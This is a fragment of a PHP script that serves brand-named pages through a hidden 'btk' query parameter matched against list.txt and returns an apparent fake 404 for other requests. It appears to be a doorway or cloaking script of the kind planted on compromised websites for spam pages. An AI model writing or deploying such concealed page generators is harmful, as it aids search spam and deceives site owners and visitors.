MASIH PEMULA SORRY KALAU NYENGGOL BOS KUU";
}
$tunnel = "btk";
$filename = "list.txt";
if (isset($_GET["$tunnel"])) {
$lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$target_string = strtolower($_GET["$tunnel"]);
foreach ($lines as $value=>$item) {
if (strtolower($item) === $target_string) {
$BRAND = strtoupper($target_string);
$selectedVal = $value+1;
}
}
if (isset($BRAND)) {
$BRANDS = $BRAND;
$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
$fullUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
if (isset($fullUrl)) {
$parsedUrl = parse_url($fullUrl);
$scheme = isset($parsedUrl['scheme']) ? $parsedUrl['scheme'] : '';
$host = isset($parsedUrl['host']) ? $parsedUrl['host'] : '';
$path = isset($parsedUrl['path']) ? $parsedUrl['path'] : '';
$query = isset($parsedUrl['query']) ? $parsedUrl['query'] : '';
$baseUrl = $scheme . "://" . $host . $path . '?' . $query;
$urlPath = $baseUrl;
} else {
echo "URL saat ini tidak didefinisikan.";
}
} else {
feedback404();
exit();
}
} else {
feedback404();
exit();
}
include('content.php');
?>